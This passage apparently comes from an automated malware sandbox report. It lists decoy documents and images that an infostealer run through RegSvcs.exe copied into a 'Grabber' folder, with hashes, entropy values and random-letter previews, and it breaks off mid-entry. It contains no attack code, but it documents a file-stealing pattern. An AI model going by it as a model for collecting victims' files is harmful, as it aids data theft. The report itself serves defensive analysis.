UKASCHBKX

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\BXAJUJAOEO.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701111373123985
Encrypted:	false
SSDEEP:	24:wSplMoG/A1oXDoMwazZW6QAFWyGjkGKnEuDxOaV9YnF7U:walZG/A12L8MFYr8EuxTK9U
MD5:	CA5A3E2A0C2DDF92EABE165672425976
SHA1:	1933AC1A510945A766039E7E61D7DA4156E0F074
SHA-256:	4180C6A01C86C7D86A51B5C17957BAECF34EBB7FCB6C5968835A5DB64E3C9667
SHA-512:	64FC7B64CDAF57CF026C803A16036BDDC46CA86AC9C35A804FCE188AFA3056C324D62CCEBD45E7E607A53D11A1035CB6C38B24004D14F0DC17B11D8DFBD7DB6C
Malicious:	false
Preview:	BXAJUJAOEOZPYQVMPMMPXXMVCPSLTTLUOLYYQUQKLRMOQNFWEOCYDOLITPCVDLYSWYQACZEJIDILMNOOUVEVBOSWPXYLBOGFYWHZVFNHRJXYLODFWJLFJKMUXRMLQJAGMERGOWKSMBXUJUMRUBMROMDBISUWTFWPXBVVSTBYHRHUOKCJNGMCOLUFOVLKFFIUZHRPZUITDNNTTEJKTUSBPVEUSTDXHRMZNWZQSUEGRYELXBLVKZHEIVACMOHJWFJRPJKNIDOXZHIEUDGLSGKALGUCHSOBYGTVWDOVYUEMXJWYDCHTXKLWDJLIZFFBQOMRYKZVRXZYKIPKCJEYOVOQCGFXCUNQKHYBXFYRGYUQAUKMCSQKKDJIQWKZEWMJWHJDDENKZLPNJAJLVIEXHEGVFHRIOBAWGXOXLQJIISBHZZGJYZBYNUOKMCKTICSMRTMZVLKMZTCWKHOHWQBKEBGEASMMYEGDDSCGDTYEPANLCQSJIRCTCUHXIVGBREMBTULUXWAZISUYERUZPWQLRSPPVNCMSPDUHQTJKYNEEWYIFNUCJJSDFDNQJLWDBLURDBXKLJVMGWUBKEXPYFIJNWRSUNUJBZAWJQEZWEYFLNXWPKFJZFMVPYOJFFUYCTEUKFWSOFUOTKIGENNTAAXCAHPWQNKMKKGNWIOGZOBPOTDAQLZSIGMQTNQVGQJNNITTRMOHBPCHTGJANZTLZHNSTOQXJKIAZXWPQWIDJXZUURGYMTMZTWQNTRVEKAAWBRZQWZYVWKWEVAUTRSOXDHWSYIZYRJFVXSPNFOTDNAGHDFYSAEEFBXGQQGYMZHMQHZTDMNYXDQJKMLAXJWCBQUIKQFEPVZNRMOWEKGFDLUJLSXRKKJUIGCSCGZTXLHOWGMKDLSQHDWSPCYROUJEHKXBJSADOXSOMTTUGHDSOBTNUEDCBNWNIDSDBZKBGFCJHQNDVAAZTKEIMDCTKNOQUKPNHEQOBANQSCJQRQBRAIBBXRYTT

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\GLTYDMDUST.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\GLTYDMDUST\GLTYDMDUST.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\GLTYDMDUST\HMPPSXQPQV.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\GLTYDMDUST\LFOPODGVOH.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJIFVOMWEUJULPMGUSEWAZAHAZVGRSWNQYXPMKFWQGODZHVNOEXZBPLONONBPAHCDWEMSFLRJBFMOKMCLAGRJEGRTGVETXSZKDXQWEOD

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\GLTYDMDUST\LIJDSFKJZG.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69486718145169
Encrypted:	false
SSDEEP:	24:XvKYeI9D5UOyoiaxIKgpZ9ONvMyTONN5ZjJH1U:yyD6yxILZ9OtTT+XRG
MD5:	E63B196AE0D5F7670244FB1347D75EFC
SHA1:	1C17108AC7E5263674836BAD67AE44D8C3C6890B
SHA-256:	D8C0D7B9CDFC72CAAB0A7687299B6734708E98C6DD088CDB0FF1A659E294B49D
SHA-512:	63345352964E1BD19AC843F82820E9B29C5BA991A002AB9B3164E1AA10B6D88BFA0DFAFA2E91E584835BA89B6A1770140AC14EA0B4B64E6C3BF8CDA34C9698AC
Malicious:	false
Preview:	LIJDSFKJZGBDGXNCCVBULCELYCDFJRIXKMFPVDHHKPYEYOXKFYMNEETRQHXLDRVBOTNERMYOYUJOPHUSKFPWBGKNJYBGZTTHNKGNUZWATSMORYBOIKBFSVUUMZNDYXOYKYUKGRNFVRQOPBEEIPDGTPBXCNLKHMGPHFCEQOUTEDGJZTMFUUGECZETRSODGZCJVQEAMRZADPDVQRANZOSHTGPOXPXGXXQDJVYZOCNXDECWJISPPIJOZUBSSKPGODUHTISNESPZRLELINJJYOXSBFTVUDENIBRDIMMGFIQNDGUSXDBHQNJRYLFTZGOCELKZGOQQKNDPFAMTXHBKHJYXYEGLJLANRMMTCVEFYRTWLXIMCCHDWVOLGVUWRNLSIBMLMBKVSYLKXRTMZROHVHCRDBCODTPNVQMBPRJGBGOOFVGDIERMXUFETJQWDXSQQFMQAZGGRVNRCUOAVYJDIMQETJOANIIDEGJCHEFRSNVBQAQBBUTTMXBTJXRHLSOCTPPBIKPXITOOCINTVZYAVQLVOOZWSOPLYJPOTKFKIKEHIDDPCDDEPKVDYQAVTVBFYYWCGUKGIDVLQSIPXISDEDNJWONTSILFUGUYMKQLKEJGOOCBYSXDFHNFHHWGLXWWQKSSOHSSTZLRZVRHZVBZGGEZQFSIWQQPMILSPBAMPAGAHHVJJCITDTJRZTRBEXSXOVDKONGLMSWBAOOYAFISJHKEYUKIWXBFUDUMVQRELEPVTNQBALAQOEAEFVPIKNYIPNICGKQFRVXNQUEFULLOYWMHOMUFEMHYNKNWMAOBGWSECZOKWISDOIKSUVWBGWPNAMFUHBRWEJQPHFPEKIRLAEPTBNRQEUVXXIZSSOOEFEETUMNPSVEAKOXVYHAOIXBEYBVXDJXZCNDVOPZLARFFUSXUOWXQBKDLINBWBQLXLHHNIXZEPCNHFEIZUZSTXWFUITSBKYSELMNKNBBDQMNLAIOSKYHCWGFPNUXAFSRHOWYH

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\GLTYDMDUST\UNKRLCVOHV.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698999446679606
Encrypted:	false
SSDEEP:	24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
MD5:	73351F70BFEF33BEEA9E1CC192801D02
SHA1:	ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
SHA-256:	F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
SHA-512:	56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
Malicious:	false
Preview:	UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\HMPPSXQPQV.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\HMPPSXQPQV.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\HMPPSXQPQV\BQJUWOYRTO.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.68639364218091
Encrypted:	false
SSDEEP:	24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
MD5:	1D78D2A3ECD9D04123657778C8317C4E
SHA1:	3FAA27B9C738170AEE603EFAE9E455CA459EC1B7
SHA-256:	88D5FF8529480476CA72191A785B1CCDB8A5535594C125AF253823DD2DC0820E
SHA-512:	7EA58B30CB5FDA1C4D71DC65DF64FD9703E81DDCBAD9DA5B405CBBEACB9197A6E8B933C844289D7852801B6A5BC545C4234DD69E85F0AF640F5BC51BE5DDA12E
Malicious:	false
Preview:	BQJUWOYRTOLXZEKCXDLSWRNMFMCSYXRPFWPCFOMLTXRLOYSWDYNKGJBBEKHPTUBSJDZWIUKDQVTQQAEIJPJKOPTWULSKKXLSOLVYRREVXVSZLFQQBXKKCMYLLBRWPJMBHNBFTQUBUPFYXLIARNGQLIDNRZYVXHIWZXDZUYNJJXBTDFJWBKWCQQGPRFDTAZULKSSEFZTUDJOKODZLAIWAICBXNPXUMZFRUVBQDJIENEPBRWTDBODAVKDNOLRNYNBKKQBPGBUTIJCMZXSCKDRZIHJDDUPOXQOJQXAOMBHVIUUZBSRKPYCRBAHBBGKXGMODRWMTAMVEFAPKYMHWCUCKKJSLQYPIMPYZKZKPIXSZAPTLQLZGQHTXZBXONOWDVDWQMPDILYOIVFKXBUSTSFUGKZZBFUUTDDOMVPOINIMBFTSGRRDLSLPUXATPQGHCHIJRAGXNYBQOTZSNMAZCEDHOUMBJWJSCXGDMRQCIYNBQTBGKDTCTKRJCRXWGYTZRFYVOFBTBDYLRCDVRFBCHFMPWSBHHWRRLBRKCLDQRSMCLVZAGFMWLPHYJGALXNLZXJVWWXBFHYIZDZFXDBTHZKRDQBGOXOULNHYYUXXATXCLPLWIUBSSSLNJBTSMXAWVUVUVKDAOHXCIVGHJLVIETMJMFWUZTFVNALCFBKNUVWGXUEPDHVHGOBZRVOPDFCORECRQJIXMUFIACDLBMTHCLLXOISHLMFTEBKUAICYBSNGCASKNQBLIPLSIPNJTWJLGARSXDGLOKVQSUASJSIRFNLKQTPVOVXSGKMXEEUVWMULGSMRQRMICWPXBVELHRSUIIUSGMSRWNPMSLNFKZWDRGGAVGKNPMSZMHRWAKTDXUHZPMIYCRABYQLAAVOSTLMEJGFHJSMBRQBEICTCXKKZHNUWSZMQZHAMPRHAWDVATODUFFRHCHJYGQZNMBWVRFZTJLSUUUMCUEOZEUMCJAOLHOIJTNPLJBASLIHCUCMVTUNIOK

C:\Users\user\AppData\Local\50258fbd039b7763b78e3cbf6b4d4ee3\user@928100_en-CH\Grabber\DRIVE-C\Users\user\Documents\HMPPSXQPQV\BUFZSQPCOH.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
